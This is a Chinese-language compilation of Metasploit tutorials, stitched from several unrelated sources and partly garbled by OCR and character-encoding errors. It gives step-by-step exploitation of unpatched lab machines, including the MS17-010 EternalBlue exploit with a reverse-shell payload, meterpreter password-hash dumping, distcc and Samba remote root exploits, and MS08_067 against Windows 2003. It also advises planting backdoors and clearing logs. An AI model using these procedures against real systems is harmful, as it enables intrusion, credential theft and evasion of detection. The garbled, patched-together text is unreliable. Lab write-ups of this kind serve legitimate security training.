完整版Metasploit利用溢出漏洞远控Windows靶机操作指南
- 格式:docx
- 大小:755.34 KB
- 文档页数:15
msf使用手册Metasploit Framework(MSF)是一种广泛使用的渗透测试工具,它允许攻击者或者安全工程师模拟真实的攻击手法,测试系统的安全性。
它内置了一系列模块和漏洞,可以自动化测试目标系统是否易受攻击,并提供可靠的漏洞验证和利用。
本文将介绍MSF的一些基本操作和注意事项,并给出一些常用的命令和示例。
安装和配置安装Metasploit Framework是非常容易的,只需要下载所需的包或者从源码编译即可。
我们建议使用Kali Linux或者其他的 Linux 发行版,因为它们通常自带了MSF。
然而,如果你想从源码安装,你需要在机器上安装Ruby和PostgreSQL等依赖组件。
安装好后,你需要对MSF进行基本的配置,并生成一个会话。
以下是一些常用的配置命令:```msfdb init # 初始化MSF数据库msfdb run # 启动MSF数据库msfconsole # 启动MSF控制台db_status # 查看数据库状态db_nmap # 进行Nmap扫描db_autopwn # 利用数据库中的漏洞对系统进行扫描```对MSF进行基本配置后,你可以开始使用这个工具来测试目标系统了。
探测漏洞一旦你找到了一个目标系统,你就可以使用MSF探测系统是否存在漏洞。
这可以使用 MSF内置的一些模块来实现。
有很多模块可以帮助你快速定位漏洞,其中一些模块将在下面的示例中进行介绍。
```db_nmap <IP> # 使用Nmap对目标系统进行扫描spacewalk_check <IP> # 检测目标是否运行了Spacewalkexploit/remote/http/jboss_invoke_deploy <IP> # 对JBoss AS进行漏洞利用exploit/linux/http/centos_rpmsign_exec <IP> # 利用RPM包管理器漏洞```探测到漏洞后,你需要确认是否真正存在漏洞,以及漏洞能否被利用。
Metasploit简单的渗透测试案例案例背景:假设我们是一家网络安全公司的安全分析师,我们被雇佣来测试一些公司的网络安全性。
我们已经通过一些信息收集技术获得了公司的IP地址和域名。
现在我们将使用Metasploit来测试他们的网络安全性。
步骤1:信息收集首先,我们使用一些信息收集工具(如nmap)来确定目标公司的网络拓扑和开放端口。
通过分析这些信息,我们可以确定潜在的攻击目标。
步骤2:扫描漏洞接下来,我们使用Metasploit的漏洞扫描工具(如Nexpose)来扫描目标网络上的漏洞。
这些漏洞可能包括操作系统漏洞、应用程序漏洞、配置错误等。
通过扫描漏洞,我们可以确定哪些系统存在安全风险。
步骤3:选择攻击模块根据我们在步骤2中发现的漏洞,我们选择相应的攻击模块。
例如,如果我们发现目标系统上存在一个已知的漏洞,我们可以选择使用Metasploit的相应模块进行攻击。
步骤4:配置攻击模块在选择了攻击模块后,我们需要配置一些参数以适应目标系统。
这些参数可能包括目标IP地址、端口号、漏洞类型等。
我们可以使用Metasploit的命令行界面或图形界面来配置这些参数。
步骤5:执行攻击一旦我们配置好了攻击模块,我们可以使用Metasploit的exploit 命令来执行攻击。
Metasploit将尝试利用目标系统上的漏洞来获取对系统的控制权。
步骤6:获取权限一旦攻击成功,我们需要获取对目标系统的权限。
我们可以使用Metasploit的post-exploitation模块来执行各种任务,如查找敏感信息、提权、创建后门等。
步骤7:清理痕迹在完成渗透测试后,我们应该清理所有的痕迹,以确保我们没有留下任何可追溯的证据。
Metasploit提供了一些模块来执行这些任务,如清除日志、删除后门等。
步骤8:报告编写最后,我们应该撰写一份详细的报告,描述我们在渗透测试过程中发现的漏洞、攻击的成功率以及建议的修复措施。
这个报告将帮助目标公司了解他们的网络安全状况,并采取适当的措施来加强安全性。
Metasploit详解详细图文教程1. 一、metasploit简介Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。
Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。
它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。
这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使Metasploit Framework 成为一种研究高危漏洞的途径。
它集成了各平台上常见的溢出漏洞和流行的shellcode ,并且不断更新。
目前的版本收集了数百个实用的溢出攻击程序及一些辅助工具,让人们使用简单的方法完成安全漏洞检测,即使一个不懂安全的人也可以轻松的使用它。
当然,它并不只是一个简单的收集工具,提供了所有的类和方法,让开发人员使用这些代码方便快速的进行二次开发。
其核心中一小部分由汇编和C语言实现,其余由ruby实现。
不建议修改汇编和C语言部分。
1. 二、搭建metasploit环境Windows环境下安装。
从官方网站/下载windows版本的安装版,直接安装即可。
安装的版本是3.5.1。
安装时需要注意以下两点:1. 在安装的时候要关闭杀毒软件。
否则的话会导致杀毒软件和metasploit冲突,导致安装失败。
2. 在控制面版——区域和语言选项——选择英文(美国)——高级选项卡中选择英文(美国)。
因为在安装的时候,会进行检测,如果属于非英文地区会导致安装失败。
如果安装有杀毒软件,会经常提示在metasploit的安装目录下检测到病毒或木马。
Linux下环境下安装。
官方网站提供了两种Linux下的安装方式,一种是打包好的metasploit安装包,如framework-3.5.1-linux-i686.run,里面包含了安装所需要的各种包,下载后直接在电脑上安装即可。
Kali系统metasploit使⽤教程基础配置由于kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的⽅式不起作⽤。
在kali 2.0中启动带数据库⽀持的MSF⽅式如下:1 ⾸先启动postgresql数据库:/etc/init.d/postgresql start;或者 service postgresql start;2 初始化MSF数据库(关键步骤!):msfdb init;(如不能初始化,就⽤msfdb reinit试试吧!默认创建的数据库名:msf,msf_test;⽤户名:msf;⼝令默认为空)3 运⾏msfconsole:msfconsole;4 在msf中查看数据库连接状态:db_status。
5更新metasploit:msfupdate(我的更新,暂未成功,应该是源的问题!)6设置启动⾃动启动msf和postgresql:update-rc.d postgresql enableupdate-rc.d metasploit enable好了,现在我们来试试,怎么⽤吧!在Metasploit中扫描在Metasploit中,附带了⼤量的内置扫描器。
使⽤这些扫描器可以搜索并获得来⾃⼀台计算机或⼀个完整⽹络的服务信息。
本节将介绍使⽤Metasploit中的辅助模块实现扫描。
【实例4-4】在Metasploit中,扫描⽬标主机。
具体操作步骤如下所⽰:(1)启动MSF终端。
执⾏命令如下所⽰:root@kali:~# msfconsolemsf>(2)搜索所有可⽤的扫描模块。
执⾏命令如下所⽰:msf > search scannerMatching ModulesName Disclosure Date Rank Description—- ——————– ———– ———————————————auxiliary/admin/smb/check_dir_file normal SMB Scanner Check File/Directory Utilityauxiliary/bnat/bnat_scan normal BNAT Scannerauxiliary/gather/citrix_published_applications normal Citrix MetaFrame ICA Published Applications Scannerauxiliary/gather/enum_dns normal DNS Record Scanner and Enumeratorauxiliary/gather/natpmp_external_address normal NAT-PMP External Address Scannerauxiliary/gather/windows_deployment_services_shares normal Microsoft Windows Deployment Services Unattend Gathererauxiliary/pro/nexpose normal PRO: Nexpose Scanner Integrationauxiliary/pro/webscan normal PRO: Web Application Scannerauxiliary/scanner/afp/afp_login normal Apple Filing Protocol Login Utilityauxiliary/scanner/afp/afp_server_info normal Apple Filing Protocol Info Enumeratorauxiliary/scanner/backdoor/energizer_duo_detect normal Energizer DUO Trojan Scannerauxiliary/scanner/chargen/chargen_probe 1996-02-08 normal Chargen Probe Utility输出信息显⽰了,Metasploit中所有可⽤的扫描模块。
基于Metasploit的攻防实验本次实验的目的,是通过Metasploit的攻击过程,对远程缓冲区溢出获取系统权限有一个感性的认识,包括MSF的使用方法,攻击的必要步骤、效果和被攻击系统观察到的现象。
实验环境:建议:攻击机(BT5)、HoneyWall、靶机(Linux_target)最低要求:攻击机,靶机。
在最低要求下,需要把攻击机和靶机都放在一个虚拟机的VLAN中,NAT或Host都可以。
MetasploitMetasploit是的一个集成了多种工具的攻击工具集合,主要用途是进行远程缓冲区溢出实验。
进入Metasploit进入BT5系统,登陆后输入 startx,进入图形界面。
在图形界面,点击terminal图标,进入终端界面在终端界面输入 msfconsole,进入metasploit的控制台,第一次进入会比较慢。
扫描靶机,发现可选择的漏洞在msf的控制台下输入nmap –sS –A –P0 靶机IP地址探测靶机存在的服务及版本,目前我们的靶机存在的服务比较多包括Apache,Tomcat,Samba,distcc,Mysql等等。
这些服务是稍后选择攻击种类的依据。
使用Metasploitmsf进行攻击包括三个步骤,选择对应的服务漏洞、选择攻击负载,选择攻击参数。
选择对应的服务漏洞例我们选择希望选择攻击samba服务的漏洞,首先在控制台输入 search s amba,查找msf目前支持的攻击samba漏洞的代码有哪些,msf会给出一系列针对不同平台不同版本的Samba服务攻击代码,一般越新的代码越有效,越老的代码,由于系统可能已经打了补丁或者升级,会不能攻击成功。
同时注意选择攻击的平台是Linux\Windows\OSX还是多平台(multi)我们在这个选择一个multi,在msf控制台下输入use e xploit/multi/samba/usermap_script此时我们进入了该攻击代码的子菜单,如果要更换攻击代码,输入 back返回上一级控制台菜单。
Metasploit 渗透未打补丁的windows 2003server 教程演示之前,我先介绍一下演示的环境配置:使用Vware10.0构建两个虚拟机,分别采用kali-linux和windows 2003 server sp3操作系统,宿主机操作系统是windows 7。
首先将windows 2003 server sp3 虚拟机作为被渗透的目标机,IP地址为192.168.1.103;kali-linux虚拟机作为攻击机,IP地址为192.168.1.2。
之所以选择kali-linux系统作为攻击机,是因为其本身就是黑客最常用攻击的平台,系统整合了许多用于攻击的程序。
Kali-linux系统界面如下图1所示。
靶机windows2003server sp3 系统如图2 所示。
图1目标主机的截图图2首先,在kali-linux系统终端运行:service postgresql start和service metasploit start 两个命令,其中前者是开启SQL数据库服务的命令,后者是运行metasploit渗透测试框架程序的命令。
如图3所示,表明服务运行成功。
接着在终端输入msfconsole命令,运行metasploit 命令行程序,程序运行成功。
如图4所示。
开启服务图3运行msfconsole图4由于windows 2003 server 是微软应用最广泛的企业级操作系统之一,这次我们针对其netapi32.dll漏洞进行渗透。
至于为什么会针对此漏洞进行渗透,是因为通过前期大量的扫描获得了主机存在这个漏洞信息,这些工作不在此次演示范围,在此忽略。
第二步,运行search netapi 命令搜索netapi,在metasploit框架中列出所有与netapi相关的漏洞利用代码。
如图5所示。
图5从列出的结果上看,最后一个漏洞利用代码的评级为great,所以优先使用该漏洞利用代码。
输入命令:use exploit/windows/smb/ms08_067_netapi,如图6所示。
MS17-010远程溢出漏洞(CVE-2017-0143)拿权限0x00我这边⽤的是安界⽹的靶场⾸先来开启靶场关于漏洞的介绍:MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在⼤⾮分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。
函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调⽤srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的⼤⼩,因计算⼤⼩错误,⽽导致缓冲区溢出。
0x01漏洞扫描⾸先我们来ping⼀下⽬标靶机可以看到是成功的在来看⼀下⽬标机开发的端⼝利⽤⼯具nmap命令如下nmap -sV -Pn 192.168.0.2⼀定要记住Linux需要区分⼤⼩写可以看到开放了 135 139 445 端⼝我们使⽤扫描模块看该漏洞是否可以利⽤命令如下msfconsole这边可以看到是可以利⽤的打开 metasploite 命令⾏客户端,使⽤search命令查找ms17-010漏洞的相关模块search ms17-010use auxiliary/scanner/smb/smb_ms17_010set RHOSTS 192.168.0.2然后直接run或者exploit 两个命令意思相同执⾏结果⼀样我这边是直接run0x02漏洞利⽤从上⼀步骤可以看出,该漏洞是可被利⽤的,接下来,我们使⽤漏洞利⽤模块use exploit/windows/smb/ms17_010_eternalblueshow options⽬标机host地址:192.168.0.2set RHOSTS 192.168.0.2之后,选择载荷payload,也就是shellcode,此处我们选择回连⾄控制端shell的payload配置中缺少本地主机 LHOST,设置⼀下set LHOST 192.168.0.3本地端⼝LPORT默认为4444,可通过set LPORT 端⼝号修改完成配置后,运⾏exploit或者run,开始执⾏漏洞利⽤模块0x04远程登录⽬标机我们已经成功的获取Session会话了,本次我们继续介绍meterpreter后渗透模块的其他功能运⾏sysinfo查看⽬标机器相关信息sysinfo中⽂乱码问题不打紧不打紧执⾏help命令可以帮助我们了解meterpreter有哪些功能help接下来,我们获取⽬标机hash值执⾏hashdumphashdumpok了本次内容就到这⾥希望⼤家也去练习练习。
Metasploit详解详细图文教程Metasploit是最流行的渗透测试框架之一,用于发现和利用安全漏洞。
它提供了一套完整的工具和资源,帮助安全专业人员评估网络系统的安全性。
本文将为你提供Metasploit的详细图文教程,帮助你了解Metasploit的基本概念和使用方法。
第一部分:概述第二部分:安装和配置2. 安装Metasploit:根据你的操作系统,选择适合的安装程序,并按照提示进行安装。
安装过程可能需要一些时间和磁盘空间。
3. 启动Metasploit:安装完成后,你可以在命令行终端或图形化界面中启动Metasploit。
第三部分:基本用法1. 扫描目标系统:使用Nmap等工具扫描目标系统,获取系统的开放端口和服务。
2. 选择exploit:根据目标系统的漏洞和发现的服务,选择适合的exploit模块。
exploit模块是用于利用系统漏洞的代码。
3. 配置exploit:根据目标系统的信息和漏洞的要求,配置exploit 模块。
例如,指定目标系统的IP地址或域名。
4. 执行exploit:运行exploit模块,攻击目标系统。
如果漏洞成功利用,你将获取对目标系统的访问权限。
5.探索目标系统:一旦获得对目标系统的访问权限,你可以进一步探索目标系统,并收集敏感信息。
第四部分:深入了解1. Payloads:在Metasploit中,Payload是一段代码,用于在目标系统上执行特定操作。
常见的Payload包括命令Shell、远程Shell和Meterpreter等。
2. Meterpreter:Meterpreter是Metasploit中最常用的Payload 之一,它提供了灵活的远程访问和控制目标系统的功能。
3. 主机和目标:在Metasploit中,主机是指运行Metasploit框架的系统,而目标是指你试图攻击的系统。
4. 模块:Metasploit提供了各种模块,用于系统发现、漏洞利用、远程控制等任务。
竭诚为您提供优质文档/双击可除
microsoft,windows远程桌面协议中间
人攻击漏洞
篇一:系统安全加固方案-2
系统安全加固方案
文档说明
1.mandrakelinux和corporate服务器apache默认安装漏洞(cVe-20xx-1449)漏洞
1.1漏洞清单
3/18
1.2加固方案
apachegroup
升级apache1.3.19以上版本即可
1.3回(microsoft,windows远程桌面协议中间人攻击漏洞)退方案
1、做好apache备份恢复
1.4加固结果
已修复
4/18
2.memcached未授权访问漏洞【原理扫描】漏洞
2.1漏洞清单
5/18
篇二:metasploit利用溢出漏洞远控windows靶机操作指南
1网络测试环境构建
首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行kalilinux系统的计算机,如图2所示的windowsserver20xx系统的计算机和如图3所示的运行windows7系统的计算机。
显然这三台计算机处于同一个网段中,可以相互通讯,kali系统用作攻击机,下面将在此系统上运行metasploit进行渗透测试,而windows20xx和windows7系统都是本次任务中需要进行渗透入侵的靶机,保持安装后的默认状态,没有打额外的系统安全补丁。
图1kali攻击机
图2windows20xx靶机
图3windows7靶机
2扫描靶机
在正式开始渗透之前,应该对靶机进行扫描探测工作,。
Metasploit溢出Distcc后门漏洞Metasploit溢出Distcc后门漏洞【实验目的】1) 利用Distcc后门漏洞获取目标主机的root权限。
【实验原理】1) Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制。
【实验环境】【实验步骤】一、利用nmap工具扫描目标主机1.1 使用nmap命令对目标主机进行扫描。
单击桌面空白处,右键菜单选择“在终端中打开”。
如图1所示图11.2 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描。
如图2所示1.3 在终端中输入命令“msfconsole”,启动MSF终端。
如图3所示图31.4 在终端中输入命令“search distcc_exec”,搜索distcc的相关工具和攻击载荷。
如图4所示图41.5 在终端中输入命令“use exploit/unix/misc/distcc_exec”,启用漏洞利用模块, 提示符就会提示进入到该路径下。
如图5所示图51.6 在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。
如图6所示图61.7 在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。
如图7所示图71.8 在终端中输入“exploit”, 开始向目标主机攻击,攻击成功后,建立会话。
如图8所示图81.9 在终端中输入“id”,查看获得的权限t,输入命令“ifconfig”,查看目标主机IP。
如图9所示图9。
1网络测试环境构建首先需要先配置好一个渗透测试用的网络环境, 包括如图1所示的运行Kali Linux 系统的计算机,如图2所示的Windows Server 2003系统的计算机和如图 3所示的运行 Windows 7系统的计算机。
显然这三台计算机处于同一个网段中, 可以相互通讯,Kali 系统用作攻击机,下面将在此系统上运行 Metasploit 进行 渗透测试,而 Windows 2003和Windows 7系统都是本次任务中需要进行渗透入 图1 Kali 攻击机侵的靶机,保持安装后的默认状态,没有打额外的系统安全补丁。
rootMlflj2Ki3)f 厂 mine: 0carrie 『;3F 叽 r-1j 3 kA 丄PM AppLitutlgin 兮 PLic 砂常 l*-lLink enc ap r Lor al L 二口pback Irwt 1 LmtB add r i : :1/12B UP LOOPBACK RUNNING packets : 32 归「厂口 [厂石 TX packets : 32 er rars RXfl-4 IFcanflgLlrik anc4p :EThemQt HWidek ftG L G C .29^30:25: flinot addr-l :0_] 0.10.13? Beast 11©. 10.13.255 貼 Lnatfi addn fgfid r 1513c = 29f f : fofifli:25t 1/^4 JScjppa : I UP BROADCAST HUftNI^G MULHC4ST hlTU:垢舲 Moir R H pKket§: 136S7 errors:® repped :9 ovtrnjri9:9 IM packets :2S£I 92 e r r : rs:& d repp^d : G overnjfisM3 c oil 丄^icns : D t Kqdfi je L 色n :1 HUJ X J ftH b>T«:9U9JS {»Q,5 Kim TK b/tH :117672LfiHwle 苦乩(L0卫Stope: Hast MTU: 655 3S Metric:!i z B dropped ; 3 o^erruriB : 0 i :0 dropped :fl overruns :A :© _ilo fc&i Via^r Sajieh T<rminjl Holp啦rgl ⑭giffirrfFic <.vmnv*] \ i 1.4 “・hicngDft甕嗣叶E『皈盂5.J,37»®13 战•乜所有I¥fl5-W03 Hivrc^nrt Corp.习上邛缶Ci M>cuinciinCt nrrti M^djnmlittriAtor^iipetinl ijM . idtoua 1 P C^ivf IgLJUl llill"Kpi">T4R€*nn«hot i«n -cpeo 11 lc 1HH£ £uff lx B s la>c-iLdi>»j.ni irp R魁百■#£*#•*•,**■!:■目』心」珊fiaihriec■■•・■■・■・■・■罩科鼠齐五丄!5鶯J・Default GatESLy - - * ・」〜亠.匕19B18b IB■耀p:K*[11ifi«'■JlLUilAitl.r(ltCc Fg%w;u・ji:…m ?图 2 Windows 2003 靶机CbHi图3 Win dows 7靶机2扫描靶机在正式开始渗透之前,应该对靶机进行扫描探测工作,搞清楚渗透目标的系统类型、开放的端口服务、如图4所示,在Kali攻击机上执行Msfconsole命令,即可进入Metasploit 环境,如图5所示。
图3-4 msfconsole 命令pexnicted by applicable law・L EL^L lagxn: Thu May 14 12:23:04 2015 fztun 10.10.10.1 二匸•迪jtdLL : t ms teens oleI*] Starting the Eetaspl^it Framework console・・.\I I I WWI II111 IIIrak±.ng nates in n匚tepad? Eave Me^asploit Fro 匸工日二k 匚report yaur proaress and f Lnlin js 一一leam nore cn htt口:丿/工旳丄d7 ・匸口11/口已匸蹟spl□二t;=[nietasplcit .11.0-2:0)50133/0」Itcores 4.11.0 .pre.201501310JL apz :1 ・CK0]|] 十——一一=[13.39 explolcs - 7B8 auxiliaxy 一223 pas匸可能存在的安全漏洞等。
探root®*kali:〜图5进入msf环境现在可以利用MSF 框架中集成的Nmap 扫描器对渗透测试目标进行扫描,如MAC Address : 00 : 0C: 2S: FA: €2 : 02 (^JWwaze) peviice 七vpe : ^ener ial pur 口un 亡 Rimnlng: Hlcrosott W inflows At |2OU3OS CPE : epe : /□ : micro so ft.: windows xp czpe: /e zinxcroscft: windows server_2003OS details: Microsoft Windows XP SP2 ox SE3 r cr Windows : Server 2303 Network Distance: 1 hop os det;ect.J_Dii perr 匚工n 皂zl ・ Please report any mcorrec 匸 results at Http : //njrap. Dxg/s uixnll :/ . Nnsp done : t IP atidzegs (1 host up) scanned. In 1.^2 seconds msf > I图6 Windows 2003扫描结果图6和7所示,获取了靶机的开放服务和操作系统类型等信息團 root@kjli : ~|Mist > iiindp 10■丄O ・JLD ・ 13fi ex^c: nmap -0 JLO ・ 10.10Sca.rtxng £>ma.p €. 41 ( https//nmap ・亡疋灯)at 2 015-05-14 13 s02 EDT nwdi 工 xepox t-覺口工 儿。
・1.£・ 10.130 [Hast xs up (0.00017s latency)- Uoc shewn; 995PORT丄35丿上UP 13 9 / tep匸Op1025/tcp102fi/tcDSTATE cpen cjpen cpen open cpenIEL3rpCZie trb 丄口5-55IL nncroso±t-as NFS-or-IIS LSA-or-口匸巳口nclcsed portsSERVICEstarring 6 _ 41 ( http;//nmap. c-rg > ar 3015-OB-14 15 ;03 EOTIlraap 5CSL& repast for 10 n 1C 10.136 dost 13 up (0.0002503 LaEencv)-(VWwaze)imxeliable because we could 11c:匸 fxnd at least 1 □pen and 1 closed 口or 匸□evxce t ype : geziezai purpcse | phoneRimn±ng • Mie 工口;3口£匸 Wlrid 口w ■二 2 006 | 7 |Phane | VistaOS CPE : epe :/□ :nncrosott: windows_server 200S :r2 c^-e: /o :imcrDsolt :: windows 7 : S - : pr ofessiciial ope :/a :m^crcs[jf t : windows 8 qpei : :/o imrcrcsaft: wl neb 寅s epe : /ciinxcrosof^ 盘 windt3ws_vista : :— epe : /c :]nicrosoft.:window3_vist :a :: : spl OS det^axla: Windows Sazver 200^ 2* Micros oft Windows 3, BLLcxosofc Wiodcws FtiQiie T ・5 ws Server 2003 SP1, or Windows Windows Server 2C0B Network Dist 曰口匚吕: 1 h □口利用扫描器的脚步插件,还有可能直接探测出目标系统的安全漏洞, 例如如 图8所示,Nmap 利用smb-check-vulns 插件扫描探测出了 Windows2003靶机存 在MS08_067漏洞。
Net snewn :993 : filtered perts?CRTSTATE SERVICEopen139/ Ecj:Dpen netblsa □ sn.□pen jocrciscrc^as 554/匸皿□pen rtsp 2069/CCD□penicslaD5357/tcp□pen. tfsdapx102^3/tup opren uLILkZLUWrLMAC Address: DO:DC :29:«7 :tB : Ik Warning : CSScari results may be0*xo£essignal or Nindcwai or 廿・0章Mlcrosof E 谓J JIC J 口層s V±sca 7, MxcxQSDtt Windows3P0 ox 5F1.F NJindo WxndDWS7 SPL, orVista SP2Freport an# xncorrectOS diececLJLon p-errcrnei- Please ufcmit/ .Nrrap done: 二 IF address (1 hast up) scanned, in 6.. 94 msf > Iresin us a 匸 secondsncLp: "nmap. or-gf 3I inn# > maap O 10 ■丄0.1D. 131 exec: ump -0 10 i 10.10»12C图8漏洞扫描结果3利用MS08_067漏洞渗透入侵MS08_067是一个曾经在各种Win dows操作系统中广泛存在,而且危害特别严重的缓冲器溢出类型的漏洞,利用它可以在无需知道任何账户密码,也不需要受害者配合的情况下,通过网络直接远程控制受害的计算机。